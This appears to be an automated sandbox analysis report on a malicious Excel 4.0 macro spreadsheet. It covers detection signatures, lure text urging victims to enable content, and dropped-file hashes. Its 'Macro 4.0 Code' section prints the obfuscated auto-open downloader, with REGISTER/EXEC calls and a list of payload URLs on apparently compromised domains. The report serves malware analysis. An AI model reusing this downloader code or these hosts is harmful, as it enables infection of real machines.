Loading ...

Play interactive tourEdit tour

Analysis Report Calculation-1972568702-01262021.xlsm

Overview

General Information

Sample Name:Calculation-1972568702-01262021.xlsm
Analysis ID:344651
MD5:0104ed5f70a92ad434657225558532b7
SHA1:d0207be667b2f90289448078f922f0c6201cd25e
SHA256:fcc1bb0b8b6cbe484900163503f774dfad2074649247717b5c8993c560b69a0d

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Excel documents contains an embedded macro which executes code when the document is opened

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2284 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE1117B2.pngJump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 12 from the yellow bar above 13 14 @Once You have Enable Editing, please click
Source: Screenshot number: 4Screenshot OCR: Enable Content 15 from the yellow bar above 16 17 " WHY I CANNOTOPEN THIS DOCUMENT? 19 20 21
Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Calculation-1972568702-01262021.xlsmInitial sample: EXEC
Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9302"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="5" r:id="rId1"/><sheet name="Lodet" sheetId="4" state="hidden" r:id="rId2"/><sheet name="kOTI" sheetId="1" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Lodet!$A$154</definedName></definedNames><calcPr calcId="144525"/></workbook>
Source: classification engineClassification label: mal56.expl.evad.winXLSM@1/9@0/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Calculation-1972568702-01262021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF102.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Calculation-1972568702-01262021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Calculation-1972568702-01262021.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: Calculation-1972568702-01262021.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: Calculation-1972568702-01262021.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: Calculation-1972568702-01262021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: Calculation-1972568702-01262021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: Calculation-1972568702-01262021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:344651
Start date:26.01.2021
Start time:21:04:24
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 35s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:Calculation-1972568702-01262021.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.expl.evad.winXLSM@1/9@0/0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/344651/sample/Calculation-1972568702-01262021.xlsm

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE1117B2.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):8301
Entropy (8bit):7.970711494690041
Encrypted:false
SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
MD5:D8574C9CC4123EF67C8B600850BE52EE
SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
Malicious:false
Reputation:moderate, very likely benign file
Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6B1200B.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):557
Entropy (8bit):7.343009301479381
Encrypted:false
SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
MD5:A516B6CB784827C6BDE58BC9D341C1BD
SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
Malicious:false
Reputation:moderate, very likely benign file
Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CAD60290.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):848
Entropy (8bit):7.595467031611744
Encrypted:false
SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
MD5:02DB1068B56D3FD907241C2F3240F849
SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
Malicious:false
Reputation:moderate, very likely benign file
Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
C:\Users\user\AppData\Local\Temp\E7FE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):26318
Entropy (8bit):7.560526327586145
Encrypted:false
SSDEEP:384:1nnowFiBP+nr06IXG2i5SV8m2ylS8aoVT0QNuzWKPqGn8nJcAE7W:1nnlEBP+rQGx5S6f6lW+u7qk8nJDES
MD5:F26A8FCB24F89AEC605E6567062DAEC9
SHA1:CE2D8E4F49ED00EF7325C257A8A1C6BB65AE457E
SHA-256:4DE269DBCC7B947935DE3945FCB55E4DB288DAAE84E057796096314A6C40D142
SHA-512:A346979032E0DB819D440CAC130671EB4D9B898E33CD8D65228478678EC6A5B5FE8AB74232D1BADCBC7CF326FF2F1C15C7DF97B52FE3F408363AB0AE129364DB
Malicious:false
Reputation:low
Preview: .U.n.0....?..........C....I?.&..an.0.........#.z.Bj.Fq8..XS=CD.]......I...Z.....*L.)a...m.......6.VT.e}J.;.({........G+....!..~9.}.....)c......I...wJ...z.].j...h)....N..~.....O........ Y...1>@Jd..?..\..m...WD0.W2!s...b.{......C.y;...'-`...{..........z...9...X.F.iJb..2..'..hNh....S.D^n....'9.~.I...Qt.*d...z.f.3..Ov.m7.......qL[.xf.;.).^DP..6rwv..cO.PQ.d.|x.x......F^.......{....}...qG8].k...u .I...........{g..cE.:...1.........PK..........!.................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Calculation-1972568702-01262021.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Jan 27 04:04:48 2021, atime=Wed Jan 27 04:04:48 2021, length=26318, window=hide
Category:dropped
Size (bytes):2248
Entropy (8bit):4.5280364757291345
Encrypted:false
SSDEEP:48:8s/XT0jFMVkGstsNAQh2s/XT0jFMVkGstsNAQ/:8s/XojFMVxstsNAQh2s/XojFMVxstsNr
MD5:312CCD3621CA31B725895F5C5113D101
SHA1:5EAB9047057082AA8CC4C004D24C80CF41EE90B8
SHA-256:364ADD98DFD71BDBEF5817EA3CBA2AABB5D74238E2604634AC36E35871694343
SHA-512:BE430CE792858A5D4521939DA5319FDDC17F5557AAFD1BC9548DC2ABE3F58E691E52CBC546125D32DEFBF10D909853A707D9126BB8D77068C6C4A95DC9BBDA21
Malicious:false
Reputation:low
Preview: L..................F.... ........{...l..i.......i....f...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..g..;R.( .CALCUL~1.XLS..v.......Q.y.Q.y*...8.....................C.a.l.c.u.l.a.t.i.o.n.-.1.9.7.2.5.6.8.7.0.2.-.0.1.2.6.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop\Calculation-1972568702-01262021.xlsm.;.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.a.l.c.u.l.a.t.i.o.n.-.1.9.7.2.5.6.8.7.0.2.-.0.1.2.6.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 04:04:48 2021, atime=Wed Jan 27 04:04:48 2021, length=12288, window=hide
Category:dropped
Size (bytes):867
Entropy (8bit):4.485610557673065
Encrypted:false
SSDEEP:12:85QNaKLgXg/XAlCPCHaXtB8XzB/AoqX+WnicvbsaRbDtZ3YilMMEpxRljKkdMTdK:85w7/XTd6jtqYehtDv3qNArNru/
MD5:8414F2A0131381ACD99C7EB2DF6A8395
SHA1:441C9229E1B1EB432A93FFE2849197EE4DDCBED8
SHA-256:0CD64BD731CC89F13DDE77B672A46C4C7CE0962843956C9EB771ED4483705A56
SHA-512:8B61B19F0AF31E00896DEB2930FE867934A68FEAC167286FAC7CA5DB460C6E3B582B690465DF5EA8B8608EE08EE7DB6E763BD5F787BB17F7C27462D45E0296DF
Malicious:false
Reputation:low
Preview: L..................F...........7G...l..i....l..i....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....;R.(..Desktop.d......QK.X;R.(*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813848..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):148
Entropy (8bit):4.761410671188077
Encrypted:false
SSDEEP:3:oyBVomxWtMK/ykGdSbXYp6l+gHK/ykGdSbXYp6lmxWtMK/ykGdSbXYp6lv:djeMAytdSUUTHAytdSUUzMAytdSUU1
MD5:428EF8D935140E96B13978A13435377B
SHA1:02D884024638F381329087191CFEC9AD94141EA0
SHA-256:57BA116F84F5AA5B5FF4FFFEE3AD043DCE67952C0CD1FA91C0A604250340365C
SHA-512:FDBF751A1BA37914E274917704E1DEA9369103AA084F81F09B8B6014C8062B964D8555FC88D4698729939BB7D29071A7FC3ED47E1D6E6C33542A4DD936E0A920
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[misc]..Calculation-1972568702-01262021.LNK=0..Calculation-1972568702-01262021.LNK=0..[misc]..Calculation-1972568702-01262021.LNK=0..
C:\Users\user\Desktop\98FE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):26318
Entropy (8bit):7.560526327586145
Encrypted:false
SSDEEP:384:1nnowFiBP+nr06IXG2i5SV8m2ylS8aoVT0QNuzWKPqGn8nJcAE7W:1nnlEBP+rQGx5S6f6lW+u7qk8nJDES
MD5:F26A8FCB24F89AEC605E6567062DAEC9
SHA1:CE2D8E4F49ED00EF7325C257A8A1C6BB65AE457E
SHA-256:4DE269DBCC7B947935DE3945FCB55E4DB288DAAE84E057796096314A6C40D142
SHA-512:A346979032E0DB819D440CAC130671EB4D9B898E33CD8D65228478678EC6A5B5FE8AB74232D1BADCBC7CF326FF2F1C15C7DF97B52FE3F408363AB0AE129364DB
Malicious:false
Reputation:low
Preview: .U.n.0....?..........C....I?.&..an.0.........#.z.Bj.Fq8..XS=CD.]......I...Z.....*L.)a...m.......6.VT.e}J.;.({........G+....!..~9.}.....)c......I...wJ...z.].j...h)....N..~.....O........ Y...1>@Jd..?..\..m...WD0.W2!s...b.{......C.y;...'-`...{..........z...9...X.F.iJb..2..'..hNh....S.D^n....'9.~.I...Qt.*d...z.f.3..Ov.m7.......qL[.xf.;.).^DP..6rwv..cO.PQ.d.|x.x......F^.......{....}...qG8].k...u .I...........{g..cE.:...1.........PK..........!.................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\~$Calculation-1972568702-01262021.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Reputation:moderate, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.5624677136859715
TrID:
  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
  • ZIP compressed archive (8000/1) 16.67%
File name:Calculation-1972568702-01262021.xlsm
File size:26370
MD5:0104ed5f70a92ad434657225558532b7
SHA1:d0207be667b2f90289448078f922f0c6201cd25e
SHA256:fcc1bb0b8b6cbe484900163503f774dfad2074649247717b5c8993c560b69a0d
SHA512:ad0615908536b572e029c4543eee3689bc56ebd850d52b852eff4745e9b48d768f890c2a30da242e5861ff317ced33ae88e235aece3020d741f84ff70eed54bf
SSDEEP:384:ASfowL2aGcarN6IftXs5SV8m2ylTQ8aoVT0QNuzWKP8WxAJkh0lfusU5:ASfl6aGcEHy5S6f6TfW+u7DqJkhoWsU5
File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "Calculation-1972568702-01262021.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,,,,,,,,,,,,=B154(),"=FORMULA.FILL(kOTI!U54&kOTI!U55&kOTI!U56&kOTI!U57&kOTI!U58&kOTI!U59,BB53)","=FORMULA.FILL(kOTI!AC56,HI18807)","=EXEC(""r""&kOTI!AC60&"" ""&kOTI!AC59&"",D""&kOTI!AC61)",=B156(),=C156(),=HALT()"=REGISTER(HI18807,AN32726,IK16309,DI7875,,1,9)","=FORMULA.FILL(kOTI!V53&kOTI!V54&kOTI!V55&kOTI!V56&kOTI!V57&kOTI!V58&kOTI!V59&kOTI!V60&kOTI!V61&kOTI!V62&kOTI!V63&kOTI!V64&kOTI!V65&kOTI!V66&kOTI!V67&kOTI!V68&kOTI!V69&kOTI!V70,HZ48004)","=FORMULA.FILL(kOTI!AC57,AN32726)","=Vuolasd(GT17028,AQ4875,1)",=B158(),=C158(),,"=FORMULA.FILL(kOTI!U62&kOTI!U63&kOTI!U64&kOTI!U65&kOTI!U66&kOTI!U67,HI18898)","=FORMULA.FILL(""BCCJ"",IK16309)",,=B160(),=C160(),,"=FORMULA.FILL(kOTI!AC58&B169,GT17028)","=FORMULA.FILL(""Niokaser"",IK4106)","=REGISTER(BB53,HZ48004,HI18898,IK4106,,1,9)",=B162(),=C162(),"=Niokaser(0,GT17028,AQ4875,0,0)","=FORMULA.FILL(kOTI!AC59,AQ4875)","=FORMULA.FILL(""Vuolasd"",DI7875)",,"=FORMULA.FILL(kOTI!AC60,AS41071)",=A161(),=GOTO(D154),=B165(),,,"=FORMULA.FILL(kOTI!AC61,HG9961)",,,=C154(),,,,,,,,,"=INDEX(B175:B181,RANDBETWEEN(1,8))&B170",,,"=RANDBETWEEN(2222222,8888888)&"".jpg""",,,,,,,,,,,,,,,refillexpress.in/bbrwhodjdi/,,,www.hitkiss.com/ecnamkijuudz/,,,test.limulustest.ru/invzovg/,,,granadaafuegolento.com/hkjwjolm/,,,gulabengineeringworks.in.net/bbndonbik/,,,infire-krby.sk/zzpbvheke/,,,kanaimukherjee.com/wfratccnjna/,,

Network Behavior

No network behavior found

Code Manipulations

Statistics

System Behavior

General

Start time:21:04:46
Start date:26/01/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13fe10000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Reset < >